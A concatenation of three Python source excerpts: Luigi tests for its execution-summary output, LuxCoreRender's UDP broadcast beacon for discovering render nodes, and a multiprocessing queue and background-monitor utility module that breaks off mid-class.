def test_upstream_not_running(self):
class ExternalBar(luigi.ExternalTask):
num = luigi.IntParameter()
def complete(self):
if self.num == 1:
return True
return False
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
if self.num == 0:
raise ValueError()
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield ExternalBar(i)
yield Bar(i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({ExternalBar(num=1)}, d['already_done'])
self.assertEqual({Bar(num=1), Bar(num=2), Bar(num=3), Bar(num=4)}, d['completed'])
self.assertEqual({Bar(num=0)}, d['failed'])
self.assertEqual({Foo()}, d['upstream_failure'])
self.assertEqual({Foo()}, d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({ExternalBar(num=0), ExternalBar(num=2), ExternalBar(num=3), ExternalBar(num=4)}, d['still_pending_ext'])
s = self.summary()
self.assertIn('\n* 1 present dependencies were encountered:\n - 1 ExternalBar(num=1)\n', s)
self.assertIn('\n* 4 ran successfully:\n - 4 Bar(num=1...4)\n', s)
self.assertIn('\n* 1 failed:\n - 1 Bar(num=0)\n', s)
self.assertIn('\n* 5 were left pending, among these:\n * 4 were missing external dependencies:\n - 4 ExternalBar(num=', s)
self.assertIn('\n * 1 had failed dependencies:\n'
' - 1 Foo()\n'
' * 1 had missing external dependencies:\n'
' - 1 Foo()\n\n'
'This progress looks :( because there were failed tasks\n', s)
self.assertNotIn('\n\n\n', s)
def test_already_running(self):
lock1 = threading.Lock()
lock2 = threading.Lock()
class ParentTask(RunOnceTask):
def requires(self):
yield LockTask()
class LockTask(RunOnceTask):
def run(self):
lock2.release()
lock1.acquire()
self.comp = True
lock1.acquire()
lock2.acquire()
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(ParentTask())
t1 = threading.Thread(target=other_worker.run)
t1.start()
lock2.acquire()
self.run_task(ParentTask())
lock1.release()
t1.join()
d = self.summary_dict()
self.assertEqual({LockTask()}, d['run_by_other_worker'])
self.assertEqual({ParentTask()}, d['upstream_run_by_other_worker'])
s = self.summary()
self.assertIn('\nScheduled 2 tasks of which:\n'
'* 2 were left pending, among these:\n'
' * 1 were being run by another worker:\n'
' - 1 LockTask()\n'
' * 1 had dependencies that were being run by other worker:\n'
' - 1 ParentTask()\n', s)
self.assertIn('\n\nThe other workers were:\n'
' - other_worker ran 1 tasks\n\n'
'Did not run any tasks\n'
'This progress looks :) because there were no failed '
'tasks or missing external dependencies\n', s)
self.assertNotIn('\n\n\n', s)
def test_already_running_2(self):
class AlreadyRunningTask(luigi.Task):
def run(self):
pass
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(AlreadyRunningTask()) # This also registers this worker
old_func = luigi.scheduler.CentralPlannerScheduler.get_work
def new_func(*args, **kwargs):
new_kwargs = kwargs.copy()
new_kwargs['worker'] = 'other_worker'
old_func(*args, **new_kwargs)
return old_func(*args, **kwargs)
with mock.patch('luigi.scheduler.CentralPlannerScheduler.get_work', new_func):
self.run_task(AlreadyRunningTask())
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['unknown_reason'])
self.assertEqual({AlreadyRunningTask()}, d['run_by_other_worker'])
def test_unknown_reason(self):
class AlreadyRunningTask(luigi.Task):
def run(self):
pass
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(AlreadyRunningTask()) # This also registers this worker
old_func = luigi.scheduler.CentralPlannerScheduler.get_work
def new_func(*args, **kwargs):
kwargs['current_tasks'] = None
old_func(*args, **kwargs)
return old_func(*args, **kwargs)
with mock.patch('luigi.scheduler.CentralPlannerScheduler.get_work', new_func):
self.run_task(AlreadyRunningTask())
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({AlreadyRunningTask()}, d['unknown_reason'])
s = self.summary()
self.assertIn('\nScheduled 1 tasks of which:\n'
'* 1 were left pending, among these:\n'
' * 1 were left pending because of unknown reason:\n'
' - 1 AlreadyRunningTask()\n', s)
self.assertNotIn('\n\n\n', s)
def test_somebody_else_finish_task(self):
class SomeTask(RunOnceTask):
pass
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
self.worker.add(SomeTask())
other_worker.add(SomeTask())
other_worker.run()
self.worker.run()
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({SomeTask()}, d['unknown_reason'])
def test_somebody_else_disables_task(self):
class SomeTask(luigi.Task):
def complete(self):
return False
def run(self):
raise ValueError()
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
self.worker.add(SomeTask())
other_worker.add(SomeTask())
other_worker.run() # Assuming it is disabled for a while after this
self.worker.run()
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({SomeTask()}, d['unknown_reason'])
def test_larger_tree(self):
class Dog(RunOnceTask):
def requires(self):
yield Cat(2)
class Cat(luigi.Task):
num = luigi.IntParameter()
def __init__(self, *args, **kwargs):
super(Cat, self).__init__(*args, **kwargs)
self.comp = False
def run(self):
if self.num == 2:
raise ValueError()
self.comp = True
def complete(self):
if self.num == 1:
return True
else:
return self.comp
class Bar(RunOnceTask):
num = luigi.IntParameter()
def requires(self):
if self.num == 0:
yield ExternalBar()
yield Cat(0)
if self.num == 1:
yield Cat(0)
yield Cat(1)
if self.num == 2:
yield Dog()
class Foo(luigi.Task):
def requires(self):
for i in range(3):
yield Bar(i)
class ExternalBar(luigi.ExternalTask):
def complete(self):
return False
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Cat(num=1)}, d['already_done'])
self.assertEqual({Cat(num=0), Bar(num=1)}, d['completed'])
self.assertEqual({Cat(num=2)}, d['failed'])
self.assertEqual({Dog(), Bar(num=2), Foo()}, d['upstream_failure'])
self.assertEqual({Bar(num=0), Foo()}, d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({ExternalBar()}, d['still_pending_ext'])
s = self.summary()
self.assertNotIn('\n\n\n', s)
def test_with_dates(self):
""" Just test that it doesn't crash with date params """
start = datetime.date(1998, 3, 23)
class Bar(RunOnceTask):
date = luigi.DateParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(10):
new_date = start + datetime.timedelta(days=i)
yield Bar(date=new_date)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(days=i)) for i in range(10)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('date=1998-0', s)
self.assertIn('Scheduled 11 tasks', s)
self.assertIn('Luigi Execution Summary', s)
self.assertNotIn('00:00:00', s)
self.assertNotIn('\n\n\n', s)
def test_with_ranges_minutes(self):
start = datetime.datetime(1998, 3, 23, 1, 50)
class Bar(RunOnceTask):
time = luigi.DateMinuteParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(300):
new_time = start + datetime.timedelta(minutes=i)
yield Bar(time=new_time)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(minutes=i)) for i in range(300)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('Bar(time=1998-03-23T0150...1998-03-23T0649)', s)
self.assertNotIn('\n\n\n', s)
def test_with_ranges_one_param(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(11):
yield Bar(i)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(i) for i in range(11)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('Bar(num=0...10)', s)
self.assertNotIn('\n\n\n', s)
def test_with_ranges_multiple_params(self):
class Bar(RunOnceTask):
num1 = luigi.IntParameter()
num2 = luigi.IntParameter()
num3 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield Bar(5, i, 25)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(5, i, 25) for i in range(5)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('- 5 Bar(num1=5, num2=0...4, num3=25)', s)
self.assertNotIn('\n\n\n', s)
def test_with_two_tasks(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(2):
yield Bar(i, 2 * i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Foo(), Bar(num=0, num2=0), Bar(num=1, num2=2)}, d['completed'])
summary = self.summary()
result = summary.split('\n')
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 3 tasks of which:',
'* 3 ran successfully:',
' - 2 Bar(num=0, num2=0) and Bar(num=1, num2=2)',
' - 1 Foo()',
'',
'This progress looks :) because there were no failed tasks or missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_really_long_param_name(self):
class Bar(RunOnceTask):
This_is_a_really_long_parameter_that_we_should_not_print_out_because_people_will_get_annoyed = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
yield Bar(0)
self.run_task(Foo())
s = self.summary()
self.assertIn('Bar(...)', s)
self.assertNotIn("Did not run any tasks", s)
self.assertNotIn('\n\n\n', s)
def test_multiple_params_multiple_same_task_family(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(4):
yield Bar(i, 2 * i)
self.run_task(Foo())
summary = self.summary()
result = summary.split('\n')
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 5 tasks of which:',
'* 5 ran successfully:',
' - 4 Bar(num=0, num2=0) ...',
' - 1 Foo()',
'',
'This progress looks :) because there were no failed tasks or missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_happy_smiley_face_normal(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(4):
yield Bar(i, 2 * i)
self.run_task(Foo())
s = self.summary()
self.assertIn('\nThis progress looks :) because there were no failed tasks or missing external dependencies', s)
self.assertNotIn("Did not run any tasks", s)
self.assertNotIn('\n\n\n', s)
def test_happy_smiley_face_other_workers(self):
lock1 = threading.Lock()
lock2 = threading.Lock()
class ParentTask(RunOnceTask):
def requires(self):
yield LockTask()
class LockTask(RunOnceTask):
def run(self):
lock2.release()
lock1.acquire()
self.comp = True
lock1.acquire()
lock2.acquire()
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(ParentTask())
t1 = threading.Thread(target=other_worker.run)
t1.start()
lock2.acquire()
self.run_task(ParentTask())
lock1.release()
t1.join()
s = self.summary()
self.assertIn('\nThis progress looks :) because there were no failed tasks or missing external dependencies', s)
self.assertNotIn('\n\n\n', s)
def test_sad_smiley_face(self):
class ExternalBar(luigi.ExternalTask):
def complete(self):
return False
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
if self.num == 0:
raise ValueError()
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield Bar(i)
yield ExternalBar()
self.run_task(Foo())
s = self.summary()
self.assertIn('\nThis progress looks :( because there were failed tasks', s)
self.assertNotIn("Did not run any tasks", s)
self.assertNotIn('\n\n\n', s)
def test_neutral_smiley_face(self):
class ExternalBar(luigi.ExternalTask):
def complete(self):
return False
class Foo(luigi.Task):
def requires(self):
yield ExternalBar()
self.run_task(Foo())
s = self.summary()
self.assertIn('\nThis progress looks :| because there were missing external dependencies', s)
self.assertNotIn('\n\n\n', s)
def test_did_not_run_any_tasks(self):
class ExternalBar(luigi.ExternalTask):
num = luigi.IntParameter()
def complete(self):
if self.num == 5:
return True
return False
class Foo(luigi.Task):
def requires(self):
for i in range(10):
yield ExternalBar(i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({ExternalBar(5)}, d['already_done'])
self.assertEqual({ExternalBar(i) for i in range(10) if i != 5}, d['still_pending_ext'])
self.assertEqual({Foo()}, d['upstream_missing_dependency'])
s = self.summary()
self.assertIn('\n\nDid not run any tasks\nThis progress looks :| because there were missing external dependencies', s)
self.assertNotIn('\n\n\n', s)
def test_example(self):
class MyExternal(luigi.ExternalTask):
def complete(self):
return False
class Boom(luigi.Task):
this_is_a_really_long_I_mean_way_too_long_and_annoying_parameter = luigi.IntParameter()
def requires(self):
for i in range(5, 200):
yield Bar(i)
class Foo(luigi.Task):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
def requires(self):
yield MyExternal()
yield Boom(0)
class Bar(luigi.Task):
num = luigi.IntParameter()
def complete(self):
return True
class DateTask(luigi.Task):
date = luigi.DateParameter()
num = luigi.IntParameter()
def requires(self):
yield MyExternal()
yield Boom(0)
class EntryPoint(luigi.Task):
def requires(self):
for i in range(10):
yield Foo(100, 2 * i)
for i in range(10):
yield DateTask(datetime.date(1998, 3, 23) + datetime.timedelta(days=i), 5)
self.run_task(EntryPoint())
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 218 tasks of which:',
'* 195 present dependencies were encountered:',
' - 195 Bar(num=5...199)',
'* 1 ran successfully:',
' - 1 Boom(...)',
'* 22 were left pending, among these:',
' * 1 were missing external dependencies:',
' - 1 MyExternal()',
' * 21 had missing external dependencies:',
' - 10 DateTask(date=1998-03-23...1998-04-01, num=5)',
' - 1 EntryPoint()',
' - 10 Foo(num=100, num2=0) ...',
'',
'This progress looks :| because there were missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_with_datehours(self):
""" Just test that it doesn't crash with datehour params """
start = datetime.datetime(1998, 3, 23, 5)
class Bar(RunOnceTask):
datehour = luigi.DateHourParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(10):
new_date = start + datetime.timedelta(hours=i)
yield Bar(datehour=new_date)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(hours=i)) for i in range(10)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('datehour=1998-03-23T0', s)
self.assertIn('Scheduled 11 tasks', s)
self.assertIn('Luigi Execution Summary', s)
self.assertNotIn('00:00:00', s)
self.assertNotIn('\n\n\n', s)
def test_with_months(self):
""" Just test that it doesn't crash with month params """
start = datetime.datetime(1998, 3, 23)
class Bar(RunOnceTask):
month = luigi.MonthParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(3):
new_date = start + datetime.timedelta(days=30*i)
yield Bar(month=new_date)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(days=30*i)) for i in range(3)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('month=1998-0', s)
self.assertIn('Scheduled 4 tasks', s)
self.assertIn('Luigi Execution Summary', s)
self.assertNotIn('00:00:00', s)
self.assertNotIn('\n\n\n', s)
def test_multiple_dash_dash_workers(self):
"""
Don't print own worker with ``--workers 2`` setting.
"""
self.worker = luigi.worker.Worker(scheduler=self.scheduler, worker_processes=2)
class Foo(RunOnceTask):
pass
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual(set(), d['run_by_other_worker'])
s = self.summary()
self.assertNotIn('The other workers were', s)
self.assertIn('This progress looks :) because there were no failed ', s)
self.assertNotIn('\n\n\n', s)
def test_with_uncomparable_parameters(self):
"""
Don't rely on parameters being sortable
"""
class Color(Enum):
red = 1
yellow = 2
class Bar(RunOnceTask):
eparam = luigi.EnumParameter(enum=Color)
class Baz(RunOnceTask):
eparam = luigi.EnumParameter(enum=Color)
another_param = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
yield Bar(Color.red)
yield Bar(Color.yellow)
yield Baz(Color.red, 5)
yield Baz(Color.yellow, 5)
self.run_task(Foo())
s = self.summary()
self.assertIn('yellow', s)
|
netbeacon.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
################################################################################
# Copyright 1998-2018 by authors (see AUTHORS.txt)
#
# This file is part of LuxCoreRender.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import logging
import socket
import threading
import functools
import pyluxcoretools.utils.loghandler as loghandler
logger = logging.getLogger(loghandler.loggerName + ".netbeacon")
BROADCAST_PORT = 18019
class NetBeaconSender:
def __init__(self, ipAddress, port, broadCastAddress, period=3.0):
self.socket = None
self.thread = None
self.ipAddress = ipAddress
self.port = port
self.broadCastAddress = broadCastAddress
self.period = period
def Start(self):
# Create the socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Create the thread
self.thread = threading.Thread(target=functools.partial(NetBeaconSender.__BeaconThread, self))
self.thread.name = "NetBeaconSenderThread"
# Run the thread
self.stopEvent = threading.Event()
self.thread.start()
def Stop(self):
self.stopEvent.set()
self.thread.join(5.0)
self.socket.close()
def __BeaconThread(self):
logger.info("NetBeaconSender thread started.")
pingMsg = bytearray((
"LUXNETPING\n" +
str(self.ipAddress) + "\n" +
str(self.port) + "\n"
).encode("utf-8"))
while not self.stopEvent.is_set():
logger.debug("NetBeaconSender LUXNETPING sent: " + str(pingMsg))
self.socket.sendto(pingMsg, (self.broadCastAddress, BROADCAST_PORT))
self.stopEvent.wait(self.period)
logger.info("NetBeaconSender thread done.")
class NetBeaconReceiver:
def __init__(self, callback):
self.socket = None
self.thread = None
self.callback = callback
def Start(self):
# Create the socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.socket.settimeout(1)
self.socket.bind(('', BROADCAST_PORT))
# Create the thread
self.thread = threading.Thread(target=functools.partial(NetBeaconReceiver.__BeaconThread, self))
self.thread.name = "NetBeaconReceiverThread"
# Run the thread
self.stopEvent = threading.Event()
self.thread.start()
def Stop(self):
self.stopEvent.set()
self.thread.join()
# shutdown() can not be used with UDP sockets, so I can not wake up
# the thread from the socket.recvfrom()
#self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
def __BeaconThread(self):
logger.info("NetBeaconReceiver thread started.")
try:
while not self.stopEvent.is_set():
try:
data, whereFrom = self.socket.recvfrom(4096)
if (not data):
break
except socket.timeout:
continue
logger.debug("NetBeaconReceiver LUXNETPING received from " + str(whereFrom) + ": " + str(data))
tag, ipAddress, port, _ = data.decode("utf-8").split("\n")
if (tag != "LUXNETPING"):
continue
if (ipAddress == ""):
ipAddress = str(whereFrom[0])
self.callback(ipAddress, int(port))
except Exception as e:
logger.info("BeaconThread exception:")
logger.exception(e)
logger.info("NetBeaconReceiver thread done.")
|
mp.py
|
import os
import pickle
import struct
import sys
from functools import partial
from multiprocessing import Lock, Event as ProcessEvent
from threading import Thread, Event as TrEvent
from time import sleep, time
from typing import List, Dict, Optional
from multiprocessing import Process
import psutil
from six.moves.queue import Empty, Queue as TrQueue
from ..py3_interop import AbstractContextManager
try:
from multiprocessing import SimpleQueue
except ImportError:
from multiprocessing.queues import SimpleQueue
# Windows/MacOS compatibility
try:
from multiprocessing.context import ForkContext # noqa
except ImportError:
ForkContext = None
# PY2 compatibility
try:
from multiprocessing import get_context
except ImportError:
def get_context(*args, **kwargs):
return False
class ThreadCalls(object):
def __init__(self):
self._queue = TrQueue()
self._thread = Thread(target=self._worker)
self._thread.daemon = True
self._thread.start()
def is_alive(self):
return bool(self._thread)
def apply_async(self, func, args=None):
if not func:
return False
self._queue.put((func, args))
return True
def close(self, timeout=5.):
t = self._thread
if not t:
return
try:
# push something into the queue so it knows this is the end
self._queue.put(None)
# wait for the thread; it should not take long, so we use a 5 second timeout
# the background thread itself does nothing but push into a queue, so it should not take long
t.join(timeout=timeout)
except BaseException: # noqa
pass
# mark thread is done
self._thread = None
def _worker(self):
while True:
try:
request = self._queue.get(block=True, timeout=1.0)
if not request:
break
except Empty:
continue
# noinspection PyBroadException
try:
if request[1]:
request[0](*request[1])
else:
request[0]()
except Exception:
pass
self._thread = None
class SingletonThreadPool(object):
__thread_pool = None
__thread_pool_pid = None
@classmethod
def get(cls):
if os.getpid() != cls.__thread_pool_pid:
cls.__thread_pool = ThreadCalls()
cls.__thread_pool_pid = os.getpid()
return cls.__thread_pool
@classmethod
def clear(cls):
if cls.__thread_pool:
cls.__thread_pool.close()
cls.__thread_pool = None
cls.__thread_pool_pid = None
@classmethod
def is_active(cls):
return cls.__thread_pool and cls.__thread_pool.is_alive()
class SafeQueue(object):
"""
Many writers Single Reader multiprocessing safe Queue
"""
__thread_pool = SingletonThreadPool()
def __init__(self, *args, **kwargs):
self._reader_thread = None
self._reader_thread_started = False
# Work around the regular multiprocessing Queue by using SimpleQueue and patching its
# write (below) to be a single OS write, making message passing atomic
self._q = SimpleQueue(*args, **kwargs)
# noinspection PyBroadException
try:
# noinspection PyUnresolvedReferences,PyProtectedMember
self._q._writer._send_bytes = partial(SafeQueue._pipe_override_send_bytes, self._q._writer)
except Exception:
pass
self._internal_q = None
self._q_size = 0
def empty(self):
return self._q.empty() and (not self._internal_q or self._internal_q.empty())
def is_pending(self):
# check if we have pending requests to be pushed (it does not mean they were pulled)
# only call from main put process
return self._q_size > 0
def close(self, event, timeout=3.0):
# wait until all pending requests pushed
tic = time()
prev_q_size = self._q_size
while self.is_pending():
if event:
event.set()
if not self.__thread_pool.is_active():
break
sleep(0.1)
# timeout is for the maximum time to pull a single object from the queue,
# this way if we get stuck we notice quickly and abort
if timeout and (time()-tic) > timeout:
if prev_q_size == self._q_size:
break
else:
prev_q_size = self._q_size
tic = time()
def get(self, *args, **kwargs):
return self._get_internal_queue(*args, **kwargs)
def batch_get(self, max_items=1000, timeout=0.2, throttle_sleep=0.1):
buffer = []
timeout_count = int(timeout/throttle_sleep)
empty_count = timeout_count
while len(buffer) < max_items:
while not self.empty() and len(buffer) < max_items:
try:
buffer.append(self._get_internal_queue(block=False))
empty_count = 0
except Empty:
break
empty_count += 1
if empty_count > timeout_count or len(buffer) >= max_items:
break
sleep(throttle_sleep)
return buffer
def put(self, obj):
# GIL will make sure it is atomic
self._q_size += 1
# make sure the blocking put is done in the thread pool, i.e. in the background
obj = pickle.dumps(obj)
self.__thread_pool.get().apply_async(self._q_put, args=(obj, ))
def _q_put(self, obj):
try:
self._q.put(obj)
except BaseException:
# make sure we zero _q_size if the put fails (e.g. the target process died)
self._q_size = 0
raise
# GIL will make sure it is atomic
self._q_size -= 1
def _init_reader_thread(self):
if not self._internal_q:
self._internal_q = TrQueue()
if not self._reader_thread or not self._reader_thread.is_alive():
# read before we start the thread
self._reader_thread = Thread(target=self._reader_daemon)
self._reader_thread.daemon = True
self._reader_thread.start()
# if we have results waiting,
# wait until the thread is up and has pushed some of them
while not self._reader_thread_started:
sleep(0.2)
# just in case, give the reader a moment to pull anything already queued
# todo: wait until the queue is not empty, but for some reason that might fail
sleep(1.0)
def _get_internal_queue(self, *args, **kwargs):
self._init_reader_thread()
obj = self._internal_q.get(*args, **kwargs)
# deserialize
return pickle.loads(obj)
def _reader_daemon(self):
self._reader_thread_started = True
# pull from process queue and push into thread queue
while True:
# noinspection PyBroadException
try:
obj = self._q.get()
if obj is None:
break
except Exception:
break
self._internal_q.put(obj)
@staticmethod
def _pipe_override_send_bytes(self, buf):
n = len(buf)
# For wire compatibility with 3.2 and lower
header = struct.pack("!i", n)
# Issue #20540: concatenate before sending, to avoid delays due
# to Nagle's algorithm on a TCP socket.
# Also note we want to avoid sending a 0-length buffer separately,
# to avoid "broken pipe" errors if the other end closed the pipe.
self._send(header + buf)
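# Typical use (a sketch, not part of the original code): many processes may put(),
# while a single designated process get()s.
#
#     q = SafeQueue()
#     q.put({"metric": "loss", "value": 0.1})      # any writer process, non-blocking
#     batch = q.batch_get(max_items=100)           # single reader process only
#
# put() serializes with pickle and hands the actual (blocking) SimpleQueue write to the
# background SingletonThreadPool thread, while get()/batch_get() are served from the
# internal thread queue filled by _reader_daemon().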
class SafeEvent(object):
__thread_pool = SingletonThreadPool()
def __init__(self):
self._event = ProcessEvent()
def is_set(self):
return self._event.is_set()
def set(self):
if not BackgroundMonitor.is_subprocess_enabled() or BackgroundMonitor.is_subprocess_alive():
self._event.set()
# SafeEvent.__thread_pool.get().apply_async(func=self._event.set, args=())
def clear(self):
return self._event.clear()
def wait(self, timeout=None):
return self._event.wait(timeout=timeout)
class SingletonLock(AbstractContextManager):
_instances = []
def __init__(self):
self._lock = None
SingletonLock._instances.append(self)
def acquire(self, *args, **kwargs):
self.create()
return self._lock.acquire(*args, **kwargs)
def release(self, *args, **kwargs):
if self._lock is None:
return None
return self._lock.release(*args, **kwargs)
def create(self):
if self._lock is None:
self._lock = Lock()
@classmethod
def instantiate(cls):
for i in cls._instances:
i.create()
def __enter__(self):
"""Return `self` upon entering the runtime context."""
self.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Raise any exception triggered within the runtime context."""
# Do whatever cleanup.
self.release()
if exc_value is not None:
# re-raise the original exception (raising a tuple is invalid in Python 3)
raise exc_value
class BackgroundMonitor(object):
# If we will need multiple monitoring contexts (i.e. subprocesses) this will become a dict
_main_process = None
_main_process_task_id = None
_parent_pid = None
_sub_process_started = None
_instances = {} # type: Dict[int, List[BackgroundMonitor]]
def __init__(self, task, wait_period):
self._event = TrEvent()
self._done_ev = TrEvent()
self._start_ev = TrEvent()
self._task_pid = os.getpid()
self._thread = None
self._wait_timeout = wait_period
self._subprocess = None if task.is_main_task() else False
self._task_id = task.id
self._task_obj_id = id(task.id)
def start(self):
if not self._thread:
self._thread = True
self._event.clear()
self._done_ev.clear()
if self._subprocess is False:
# start the thread; we are in threading mode.
self._start()
else:
# append to instances
if self not in self._get_instances():
self._get_instances().append(self)
def wait(self, timeout=None):
if not self._done_ev:
return
self._done_ev.wait(timeout=timeout)
def _start(self):
# if we already started do nothing
if isinstance(self._thread, Thread):
return
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def stop(self):
if not self._thread:
return
if not self.is_subprocess_mode() or self.is_subprocess_alive():
self._event.set()
if isinstance(self._thread, Thread):
try:
self._get_instances().remove(self)
except ValueError:
pass
self._thread = None
def daemon(self):
while True:
if self._event.wait(self._wait_timeout):
break
self._daemon_step()
def _daemon(self):
self._start_ev.set()
self.daemon()
self.post_execution()
self._thread = None
def post_execution(self):
self._done_ev.set()
def set_subprocess_mode(self):
# called just before launching the daemon in a subprocess
if not self._subprocess:
self._subprocess = True
if not isinstance(self._done_ev, SafeEvent):
self._done_ev = SafeEvent()
if not isinstance(self._start_ev, SafeEvent):
self._start_ev = SafeEvent()
if not isinstance(self._event, SafeEvent):
self._event = SafeEvent()
def _daemon_step(self):
pass
@classmethod
def start_all(cls, task, wait_for_subprocess=True):
# noinspection PyProtectedMember
execute_in_subprocess = task._report_subprocess_enabled
if not execute_in_subprocess:
for d in BackgroundMonitor._instances.get(id(task.id), []):
d._start()
elif not BackgroundMonitor._main_process:
cls._parent_pid = os.getpid()
cls._sub_process_started = SafeEvent()
cls._sub_process_started.clear()
cls._main_process_task_id = task.id
# setup
for d in BackgroundMonitor._instances.get(id(task.id), []):
d.set_subprocess_mode()
# todo: solve for standalone spawn subprocess
if ForkContext is not None and isinstance(get_context(), ForkContext):
cls.__start_subprocess_forkprocess(task_obj_id=id(task.id))
else:
cls.__start_subprocess_os_fork(task_obj_id=id(task.id))
# wait until subprocess is up
if wait_for_subprocess:
cls._sub_process_started.wait()
@classmethod
def __start_subprocess_os_fork(cls, task_obj_id):
process_args = (task_obj_id, cls._sub_process_started, os.getpid())
BackgroundMonitor._main_process = os.fork()
# check if we are the child process
if BackgroundMonitor._main_process == 0:
# update to the child process pid
BackgroundMonitor._main_process = os.getpid()
cls._background_process_start(*process_args)
# force to leave the subprocess
leave_process(0)
return
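# Note on the fork-based start above: os.fork() returns 0 in the child and the child's
# pid in the parent. The child therefore overwrites _main_process with its own pid,
# runs _background_process_start() (which blocks until all monitor threads finish or
# the parent dies), and then exits via leave_process(); the parent keeps the child's
# pid in _main_process so is_subprocess_alive() can poll it with psutil.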
@classmethod
def __start_subprocess_forkprocess(cls, task_obj_id):
_main_process = Process(
target=cls._background_process_start,
args=(task_obj_id, cls._sub_process_started, os.getpid())
)
_main_process.daemon = True
# Hack: allow creating daemon subprocesses (even though python doesn't like it)
un_daemonize = False
# noinspection PyBroadException
try:
from multiprocessing import current_process
if current_process()._config.get('daemon'): # noqa
un_daemonize = current_process()._config.get('daemon') # noqa
current_process()._config['daemon'] = False # noqa
except BaseException:
pass
# try to start the background process; if it fails, retry a few times, then re-raise
for i in range(4):
try:
_main_process.start()
break
except BaseException:
if i < 3:
sleep(1)
continue
raise
BackgroundMonitor._main_process = _main_process.pid
if un_daemonize:
# noinspection PyBroadException
try:
from multiprocessing import current_process
current_process()._config['daemon'] = un_daemonize # noqa
except BaseException:
pass
@classmethod
